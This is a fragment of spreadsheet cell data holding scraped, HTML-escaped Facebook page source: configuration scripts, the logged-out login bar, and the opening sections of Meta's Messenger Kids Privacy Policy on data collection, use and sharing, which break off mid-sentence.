qRnqXGLQ","2WgiNOrHVuC","amKHb4Cw4WI","8rDvN9vWdAK","5BdzWGmfvrA","DDZhogI19W","acrJTh9WGdp","1oOE64fL4wO","5XCz1h9Iaw3","7r6mSP7ofr2","6DGPLrRdyts","aWxCyi1sEC7","9kCSDzzr8fu","awYA7fn2Bse","aBMlJ8QRPWE","Fl3bH3ozLe"]}},2580],["JSErrorLoggingConfig",[],{"appId":256281040558,"extra":[],"reportInterval":50,"sampleWeight":1,"sampleWeightKey":"__jssesw","projectBlocklist":[]},2776],["DataStoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[],{"prefer_message_channel":true},3419],["DTSGInitData",[],{"token":"","async_get_token":""},3515],["UriNeedRawQuerySVConfig",[],{"uris":["dms.netmng.com","doubleclick.net","r.msn.com","watchit.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","www.landmarkshops.in","www.ncl.com","s0.wp.com","www.tatacliq.com","bs.serving-sys.com","kohls.com","lazada.co.th","xg4ken.com","technopark.ru","officedepot.com.mx","bestbuy.com.mx","booking.com","nibio.no"]},3871],["WebConnectionClassServerGuess",[],{"connectionClass":"EXCELLENT"},4705],["CometAltpayJsSdkIframeAllowedDomains",[],{"allowed_domains":["https:\/\/live.adyen.com","https:\/\/integration-facebook.payu.in","https:\/\/facebook.payulatam.com","https:\/\/secure.payu.com","https:\/\/facebook.dlocal.com","https:\/\/buy2.boku.com"]},4920],["BootloaderEndpointConfig",[],{"debugNoBatching":false,"maxBatchSize":-1,"endpointURI":"https:\/\/www.facebook.com\/ajax\/bootloader-endpoint\/"},5094],["BigPipeExperiments",[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["IntlNumberTypeProps",["IntlCLDRNumberType05"],{"module":{"__m":"IntlCLDRNumberType05"}},7027],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&amp;#039;)s\u0001(?:'|&amp;#039;)s(.*)\/":"\u0001$1$2s\u0001$3","\/_\u0001([^\u0001]*)\u0001\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":3,"regionalLocale":null},772],["NumberFormatConfig",[],{"decimalSeparator":".</t>
  </si>
  <si>
    <t>","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["SessionNameConfig",[],{"seed":"1fHz"},757],["ZeroCategoryHeader",[],{},1127],["ZeroRewriteRules",[],{"rewrite_rules":{},"whitelist":{"\/hr\/r":1,"\/hr\/p":1,"\/zero\/unsupported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle\/nux\/":1,"\/zero\/toggle\/settings\/":1,"\/fup\/interstitial\/":1,"\/work\/landing":1,"\/work\/login\/":1,"\/work\/email\/":1,"\/ai.php":1,"\/js_dialog_resources\/dialog_descriptions_android.json":0,"\/connect\/jsdialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balance_redirect\/":1,"\/zero_balance_redirect":1,"\/zero_balance_redirect\/l\/":1,"\/l.php":1,"\/lsr.php":1,"\/ajax\/dtsg\/":1,"\/checkpoint\/block\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing\/":1,"\/zero\/flex\/logging\/":1,"\/tr":1,"\/tr\/":1,"\/sem_campaigns\/sem_pixel_test\/":1,"\/bookmarks\/flyout\/body\/":1,"\/zero\/subno\/":1,"\/confirmemail.php":1,"\/policies\/":1,"\/mobile\/internetdotorg\/classifier\/":1,"\/zero\/dogfooding":1,"\/xti.php":1,"\/zero\/fblite\/config\/":1,"\/hr\/zsh\/wc\/":1,"\/ajax\/bootloader-endpoint\/":1,"\/mobile\/zero\/carrier_page\/":1,"\/mobile\/zero\/carrier_page\/education_page\/":1,"\/mobile\/zero\/carrier_page\/feature_switch\/":1,"\/mobile\/zero\/carrier_page\/settings_page\/":1,"\/aloha_check_build":1,"\/upsell\/zbd\/softnudge\/":1,"\/mobile\/zero\/af_transition\/":1,"\/mobile\/zero\/af_transition\/action\/":1,"\/mobile\/zero\/freemium\/":1,"\/mobile\/zero\/freemium\/redirect\/":1,"\/mobile\/zero\/freemium\/zero_fup\/":1,"\/privacy\/policy\/":1,"\/privacy\/center\/":1,"\/data\/manifest\/":1,"\/4oh4.php":1,"\/autologin.php":1,"\/birthday_help.php":1,"\/checkpoint\/":1,"\/contact-importer\/":1,"\/cr.php":1,"\/legal\/terms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmore\/":1,"\/upsell\/purchase\/":1,"\/upsell\/promos\/upgrade\/":1,"\/upsell\/buy_redirect\/":1,"\/upsell\/loan\/buyconfirm\/":1,"\/upsell\/loan\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/wap\/appreg.php":1,"\/wap\/birthday_help.php":1,"\/wap\/c.php":1,"\/wap\/confirmemail.php":1,"\/wap\/cr.php":1,"\/wap\/login.php":1,"\/wap\/r.php":1,"\/zero\/datapolicy":1,"\/a\/timezone.php":1,"\/a\/bz":1,"\/bz\/reliability":1,"\/r.php":1,"\/mr\/":1,"\/reg\/":1,"\/registration\/log\/":1,"\/terms\/":1,"\/f123\/":1,"\/expert\/":1,"\/experts\/":1,"\/terms\/index.php":1,"\/terms.php":1,"\/srr\/":1,"\/msite\/redirect\/":1,"\/fbs\/pixel\/":1,"\/contactpoint\/preconfirmation\/":1,"\/contactpoint\/cliff\/":1,"\/contactpoint\/confirm\/submit\/":1,"\/contactpoint\/confirmed\/":1,"\/contactpoint\/login\/":1,"\/preconfirmation\/contactpoint_change\/":1,"\/help\/contact\/":1,"\/survey\/":1,"\/upsell\/loyaltytopup\/accept\/":1,"\/settings\/":1,"\/lite\/":1,"\/zero_status_update\/":1,"\/operator_store\/":1,"\/upsell\/":1,"\/wifiauth\/login\/":1}},1478],["ServerTimeData",[],{"serverTime":1681340267284,"timeOfRequestStart":1681340267260.3,"timeOfResponseStart":1681340267260.3},5943],["FbtQTOverrides",[],{"overrides":{}},551],["InitialCookieConsent",[],{"deferCookies":false,"initialConsent":[1,2],"noCookies":false,"shouldShowCookieBanner":false},4328],["CookieConsentIFrameConfig",[],{"consent_param":"FQAREhISAA==.ARYMcWh_w5xnaSw7g-fCCy0qfh21MPhSCNvOkwx_PKt84ELF","allowlisted_iframes":[]},5540],["AnalyticsCoreData",[],{"device_id":"$^|AcZNTcEogu56RMH4bOSBsc1GbG9FnPAZrPHVVTEVZstSMSLif8ahH5XRGWhYBxtmVaCGrpCvfCLbp3QR_ou4ouj83Hqps_f55w|fd.AcaVXHJ7xMu0R2lvpL5s8aBZ_aw8USvbRUbzCtwtnFRXJRn8apmP3vUQ6_5_SnZnq0qV-fl6uBgVLtcz4R8u_-Z0","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallback_for_br":true,"queue_activation_experiment":false,"max_delay_br_queue":60000,"max_delay_br_queue_immediate":3,"consents":{},"app_universe":1,"allow_br_event_identity_propogation":false},5237],["cr:1126",["TimeSliceImpl"],{"__rc":["TimeSliceImpl","Aa2tLwb5hdKLV6qgBj_1h_l3YAxh2rGy6rLCELpaIf2zBqHV53hI42MyiHt2a8JshNL6h7U2aIQiOdyIpGdZ-EE"]},-1],["cr:3769",["PromiseImpl"],{"__rc":["PromiseImpl","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:696703",[],{"__rc":[null,"Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:708886",["EventProfilerImpl"],{"__rc":["EventProfilerImpl","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:806696",["clearTimeoutBlue"],{"__rc":["clearTimeoutBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:807042",["setTimeoutBlue"],{"__rc":["setTimeoutBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:1003267",["clearIntervalBlue"],{"__rc":["clearIntervalBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:1183579",["InlineFbtResultImpl"],{"__rc":["InlineFbtResultImpl","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:925100",["RunBlue"],{"__rc":["RunBlue","Aa0EFiu5SRxwaeyaMbPC9FcGgZpMMCPvWrwU5fmQO2aPjKLGVAi0JAZed_yrFh2Kl5Xg7DbSMI_uXofK3TFSf8XVyAw"]},-1],["cr:1094907",[],{"__rc":[null,"Aa0zaOk8xz2S8-WMjr1pLJzEGQETsBRxYZbyX9oebyjlvjuLraotcIl5oSgYXw7iwacjRTWnrz9RW_bk2Xnj9Os"]},-1],["EventConfig",[],{"sampling":{"bandwidth":0,"play":0,"playing":0,"progress":0,"pause":0,"ended":0,"seeked":0,"seeking":0,"waiting":0,"loadedmetadata":0,"canplay":0,"selectionchange":0,"change":0,"timeupdate":0,"adaptation":0,"focus":0,"blur":0,"load":0,"error":0,"message":0,"abort":0,"storage":0,"scroll":200000,"mousemove":20000,"mouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_instrumentation":false,"profile_eager_execution":false,"disable_heuristic":true,"disable_event_profiler":false},1726],["AdsInterfacesSessionConfig",[],{},2393]],"require":[["markJSEnabled\u0040893d4571b571e4f671dddb2a6791950e"],["lowerDomain\u00407cecbb59da937f203679fa9478edae1d"],["URLFragmentPrelude\u00405d4b0c0ff9a92f3a404f6b9f654a3085"],["Primer\u0040d846aa4b4270861523419e2ccd0cd507"],["BigPipe\u00405662a485a17f0cae197a254595c28254"],["Bootloader\u0040fe8c8279cd44acb22f5c613a99126f52"],["TimeSlice\u0040661b50a0dbd00b34131a86a481324fad"],["AsyncRequest\u0040e111ba080b599064b436d7d61475f1c0"],["BanzaiScuba_DEPRECATED\u0040e111ba080b599064b436d7d61475f1c0"],["FbtLogging\u0040e111ba080b599064b436d7d61475f1c0"],["IntlQtEventFalcoEvent\u0040e111ba080b599064b436d7d61475f1c0"],["RequireDeferredReference\u00408bdc1c4465f106300e267caf4b18e28e","unblock",[],[["AsyncRequest","BanzaiScuba_DEPRECATED","FbtLogging","IntlQtEventFalcoEvent"],"sd"]],["RequireDeferredReference\u00408bdc1c4465f106300e267caf4b18e28e","unblock",[],[["AsyncRequest","BanzaiScuba_DEPRECATED","FbtLogging","IntlQtEventFalcoEvent"],"css"]]]});});&lt;/script&gt;&lt;/head&gt;&lt;body class="UIPage_LoggedOut _-kb _605a b_c3pyn-ahh x1 Locale_en_US" dir="ltr"&gt;&lt;script type="text/javascript" nonce="LUvh1ADT"&gt;requireLazy(["bootstrapWebSession"],function(j){j(1681340267)})&lt;/script&gt;&lt;div class="_li" id="u_0_5_A/"&gt;&lt;div id="pagelet_bluebar" data-referrer="pagelet_bluebar"&gt;&lt;div id="blueBarDOMInspector"&gt;&lt;div class="_53jh"&gt;&lt;div class="loggedout_menubar_container"&gt;&lt;div class="clearfix loggedout_menubar"&gt;&lt;div class="lfloat _ohe"&gt;&lt;h1&gt;&lt;a href="https://www.facebook.com/" title="Go to Facebook home"&gt;&lt;i class="fb_logo img sp_h4Swrc8tiWJ sx_05727a"&gt;&lt;u&gt;Facebook&lt;/u&gt;&lt;/i&gt;&lt;/a&gt;&lt;/h1&gt;&lt;/div&gt;&lt;div class="_yl4 rfloat _ohf" data-testid="royal_login_form"&gt;&lt;a href="/" id="u_0_0_/M"&gt;&lt;span style="color: white"&gt;Join or Log Into Facebook   &lt;i class="_3jii img sp_h4Swrc8tiWJ sx_0611b1" id="u_0_1_yt"&gt;&lt;/i&gt;&lt;/span&gt;&lt;/a&gt;&lt;div class="_yl7 _ylb __tw hidden_elem" id="u_0_2_hI"&gt;&lt;div class="beeperNub"&gt;&lt;/div&gt;&lt;div class="_yl8"&gt;&lt;div class=""&gt;&lt;form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;amp;lwv=110" method="post" novalidate="1" onsubmit=""&gt;&lt;input type="hidden" name="jazoest" value="2858" autocomplete="off" /&gt;&lt;input type="hidden" name="lsd" value="AVoC6c33k8o" autocomplete="off" /&gt;&lt;div class="_erp"&gt;&lt;div class="_err"&gt;&lt;label for="email"&gt;Email or phone&lt;/label&gt;&lt;/div&gt;&lt;div class="_err"&gt;&lt;input type="email" class="inputtext login_form_input_box" name="email" id="email" data-testid="royal_email" /&gt;&lt;/div&gt;&lt;div class="_ers"&gt;&lt;label</t>
  </si>
  <si>
    <t>for="pass"&gt;Password&lt;/label&gt;&lt;/div&gt;&lt;div class="_ers"&gt;&lt;input type="password" class="inputtext login_form_input_box" name="pass" id="pass" data-testid="royal_pass" /&gt;&lt;/div&gt;&lt;div class="_er_"&gt;&lt;a href="https://www.facebook.com/recover/initiate?lwv=110&amp;amp;ars=royal_blue_bar"&gt;Forgot account?&lt;/a&gt;&lt;/div&gt;&lt;button value="1" class="_42ft _4jy0 _es1 _ 3jd8 login_form_login_button _4jy5 _4jy1 selected _</t>
  </si>
  <si>
    <t>51sy" id="loginbutton" data-testid="royal_login_button" type="submit"&gt;Log In&lt;/button&gt;&lt;/div&gt;&lt;input type="hidden" autocomplete="off" name="timezone" value=" " id="u_0_3_Nh" /&gt;&lt;input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_mi" /&gt;&lt;input type="hidden" name="lgnrnd" value="155747_Vk1w" /&gt;&lt;input</t>
  </si>
  <si>
    <t>type="hidden" id="lgnjs" name="lgnjs" value="n" /&gt;&lt;input type="hidden" autocomplete="off" name="ab_test_data" value="" /&gt;&lt;input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /&gt;&lt;input type="hidden" autocomplete="off" name="next" value="https://www.facebook.com/legal/messengerkids/privacypolicy?version=2020" /&gt;&lt;input type="hidden" autocomplete="off" name="login_source" value="login_bluebar" /&gt;&lt;input</t>
  </si>
  <si>
    <t>type="hidden" autocomplete="off" name="guid" value="" /&gt;&lt;input type="hidden" autocomplete="off" id="prefill_contact_point" name="prefill_contact_point" /&gt;&lt;input type="hidden" autocomplete="off" id="prefill_source" name="prefill_source" /&gt;&lt;input type="hidden" autocomplete="off" id="prefill_type" name="prefill_type" /&gt;&lt;/form&gt;&lt;/div&gt;&lt;div</t>
  </si>
  <si>
    <t>class="_yl9"&gt;Do you want to join Facebook?&lt;/div&gt;&lt;a role="button" class="_42ft _4jy0 _ yla _4jy3 _ 4jy2 selected _</t>
  </si>
  <si>
    <t>51sy mrm" href="/reg/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjgxMzQwMjY3LCJjYWxsc2l0ZV9pZCI6MzYzOTY5MDQ0ODc4OTI4fQ%3D%3D" tabindex="4"&gt;Sign Up&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="signupBanner"&gt;&lt;div class="signup_bar_container"&gt;&lt;div class="signup_box clearfix"&gt;&lt;span class="signup_box_content"&gt;&lt;a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_US"&gt;Sign Up&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div id="globalContainer" class="uiContextualLayerParent"&gt;&lt;div class="fb_content clearfix " id="content" role="main"&gt;&lt;div class="pal _rj1" dir="auto"&gt;&lt;div</t>
  </si>
  <si>
    <t>class="mvm uiP fsm"&gt; Effective January 1, 2023.&lt;/div&gt;&lt;br /&gt;&lt;div class="fsl fwb fcb" style="font-size: 20px"&gt;&lt;b&gt;Messenger Kids Privacy Policy&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="mvm uiP fsm"&gt;Messenger Kids from Meta is a messaging and video calling app for children that helps them communicate with family and friends in a fun and age-appropriate environment. Messenger Kids is designed to give you control over how and when your child shares data and who they can communicate with.</t>
  </si>
  <si>
    <t>It also gives you insights into how your child uses the app, including access to the information your child shares and receives. Please review this Privacy Policy together with your child to ensure you both understand what information we collect when your child uses Messenger Kids and how we use and share that information. &lt;/div&gt;&lt;div class="mvm uiP fsm"&gt; Some of the features this Privacy Policy describes are optional and may be available to your child only if you choose to enable them.</t>
  </si>
  <si>
    <t>&lt;/div&gt;&lt;div class="mvm uiP fsm"&gt;When you and other Facebook account holders interact with your child on Messenger Kids, the Meta Privacy Policy shall continue to apply to you and them.</t>
  </si>
  <si>
    <t>&lt;/div&gt;&lt;div class="mvm uiP fsm"&gt;&lt;b&gt;What kinds of information do we collect?&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;/b &gt;</t>
  </si>
  <si>
    <t>We collect the following information from children and their parents or guardians when they sign up for and use Messenger Kids.&lt;/div&gt;&lt;ul class="uiList _ 4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;</t>
  </si>
  <si>
    <t>Messenger Kids Account Details:&lt;/i&gt; Depending on the features you and your child use, we collect the following information: &lt;div class="mvm uiP fsm"&gt;&lt;/div&gt;&lt;ul class="uiList _ 4of _</t>
  </si>
  <si>
    <t>4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your child’s full name;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your child’s profile picture;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Any log-in details you or your child provide;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your child’s demographic information, such as gender and birthday, if you choose to provide them; &lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Unique identifiers for your child, like a Messenger Kids username;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your child’s connection to their parents or guardians on Messenger Kids; and&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Additional information about your child that you or your child may provide.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;Use of Messenger Kids&lt;/i&gt;: We collect the following types of information about your child’s use of Messenger Kids: &lt;ul class="uiList _4of _ 4kg"&gt;&lt;li&gt;&lt;div</t>
  </si>
  <si>
    <t>class="fcb"&gt;&lt;u&gt;Content and Communications&lt;/u&gt;: We collect the content and type of messages, including stickers, gifs, photos, or videos, your child shares from both sent and received messages in Messenger Kids. These may include your child’s image or voice if provided. We also collect information about this content, like metadata, which can include information like file size, name of a photo or video, and date or time the photo was taken.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Contacts&lt;/u&gt;: We collect information about your child’s contacts on Messenger Kids and how your child interacts with them—for example, their most frequent contacts.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Usage&lt;/u&gt;: We collect information about how your child uses Messenger Kids, such as the features they use, use of audio or video calling, game play, and how they engage with the app.</t>
  </si>
  <si>
    <t>&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Contact forms and surveys&lt;/u&gt;: We collect information your child provides to us through surveys and contact forms, for example product features or bug reports in the Messenger Kids App.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;Device Information&lt;/i&gt;: We collect information about the phone or device your child uses to access Messenger Kids.</t>
  </si>
  <si>
    <t>This information includes: &lt;ul class="uiList _ 4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Device attributes&lt;/u&gt;: information like the operating system, hardware and software versions, and available storage space.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Identifiers&lt;/u&gt;: unique identifiers, device IDs, and Meta Family Device IDs (or other identifiers unique to &lt;a href="https://www.facebook.com/help/195227921252400?ref=dp"&gt;Meta Company Products&lt;/a&gt; associated with the same device or account).&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Data from device settings&lt;/u&gt;: information provided through device settings you or your child turns on, like time zone and access to your camera, photos, or microphone.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;u&gt;Network and connections&lt;/u&gt;: information like language, IP address, and connection speed.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div</t>
  </si>
  <si>
    <t>class="mvm uiP fsm"&gt;&lt;b&gt;How do we use this information?&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;ul class="uiList _ 4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;Enable your child to communicate&lt;/i&gt;: We use the information we have about you and your child to enable them to connect and communicate with others.</t>
  </si>
  <si>
    <t>&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;Personalize your child’s Messenger Kids experience&lt;/i&gt;: We use the information we have to optimize Messenger Kids for your child and others, including personalization of product features and suggesting contacts for your child. This includes placing the people your child communicates with the most at the top of their contact list, recommending features like a new sticker pack, or suggesting other Messenger Kids connections.</t>
  </si>
  <si>
    <t>&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt;Enhance our services&lt;/i&gt;: We use the information we have to evaluate, troubleshoot, improve, create, and develop our products and to help make Messenger Kids a safer, more secure and more fun place for children. This includes conducting research and analysis using information we collect in order to improve or develop &lt;a href="https://www.facebook.com/help/1561485474074139?ref=dp"&gt;Meta Products&lt;/a&gt;.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div</t>
  </si>
  <si>
    <t>class="fcb"&gt;&lt;i&gt;Communicate with parents or guardians and their children&lt;/i&gt;: We use the information we have to communicate with you and any other parent or guardian managing your child’s account. We may also use this information to communicate with your child. For instance, our communications may include information about your child’s activities and connections, updates to the Messenger Kids product, and information about our policies, terms, and practices.</t>
  </si>
  <si>
    <t>When you or your child contact us, we also use this information to respond to those communications. &lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;i&gt; Advance safety and security on and off Messenger Kids&lt;/i&gt;</t>
  </si>
  <si>
    <t>: We use the information we have to improve safety for our users on and off the product. This includes investigating suspicious activity, reported content, violations of our terms or policies, preventing spam and other bad experiences, combating harmful conduct, verifying accounts and activities, and maintaining the integrity of Messenger Kids. We may accomplish this through human review, automated systems, and/or machine learning.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div class="mvm uiP fsm"&gt;&lt;b&gt;How is this information shared?</t>
  </si>
  <si>
    <t>&lt;/b&gt;&lt;/div&gt;&lt;div class="mvm uiP fsm"&gt;&lt;/div&gt;&lt;br /&gt;&lt;ul class="uiList _ 4of _</t>
  </si>
  <si>
    <t>4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;b&gt;&lt;i&gt;Your Child’s Contacts&lt;/i&gt;&lt;/b&gt;&lt;i&gt;.&lt;/i&gt;&lt;ul class="uiList _ 4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;You have control over who can communicate with your child through Messenger Kids.</t>
  </si>
  <si>
    <t>You can approve each connection request individually, or you can choose to allow your child to make and accept connection requests on their own without your approving each one. You may also enable your child to join group conversations with Messenger or Messenger Kids users who are not individually approved. If you allow your child to make and accept connection requests or join group conversations, you will still retain the ability to review and remove contacts.</t>
  </si>
  <si>
    <t>You will have to opt in to these functionalities on behalf of your child, and you can opt out of them at any time.&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your child’s name, profile picture, active status, and relationship to you and other managing account holders are shared with the people your child communicates with. You can exercise controls available in the Parent Dashboard to decide whether your child’s contacts see additional account details from your child’s account (like birthday). &lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div</t>
  </si>
  <si>
    <t>class="fcb"&gt;The people your child communicates with see the content your child shares with them. You should carefully consider your child’s contacts and permissions, because people who can see their messages may choose to share them with others who have not been approved to communicate with your child. For example, your child’s contacts can download, screenshot, or reshare content from your child’s messages with others across Messenger Kids or other products.&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;b&gt;&lt;i&gt;Parents and Guardians&lt;/i&gt;&lt;/b&gt;&lt;i&gt;.&lt;/i&gt;&lt;ul class="uiList _</t>
  </si>
  <si>
    <t>4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;Through the Parent Dashboard, you, as the parent or guardian can download or view video and photo messages your child sends or receives on Messenger Kids. You can also review your child’s account details and account activity.</t>
  </si>
  <si>
    <t>Remember, parents or guardians of other Messenger Kids users can always see the information your child shares with their child. &lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;b&gt;&lt;i&gt;Other children, parents or guardians:&lt;/i&gt;&lt;/b&gt;&lt;ul class="uiList _</t>
  </si>
  <si>
    <t>4of _ 4kg"&gt;&lt;li&gt;&lt;div class="fcb"&gt;Your Facebook friends who manage a Messenger Kids account and people you invite to create a Messenger Kids account can see your child’s name, profile picture, and relationship to you and any other managing parents or guardians. &lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;We want to help your child find their friends on Messenger Kids.</t>
  </si>
  <si>
    <t>To do that, you can choose to allow your child’s information to be visible to additional people subject to your control on the Parent Dashboard. &lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="fcb"&gt;&lt;b&gt;Our vendors and service providers.&lt;/b&gt; We may transfer information we collect to service providers that are needed to support Messenger Kids, such as companies that provide technical infrastructure and support (like a content delivery network) or customer service, or that analyze how Messenger Kids is being used to help us improve the service.</t>
  </si>
  <si>
    <t>These partners must adhere to strict data confidentiality and security obligations, such as restrictions on how they can use the</t>
  </si>
  <si>
    <t>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
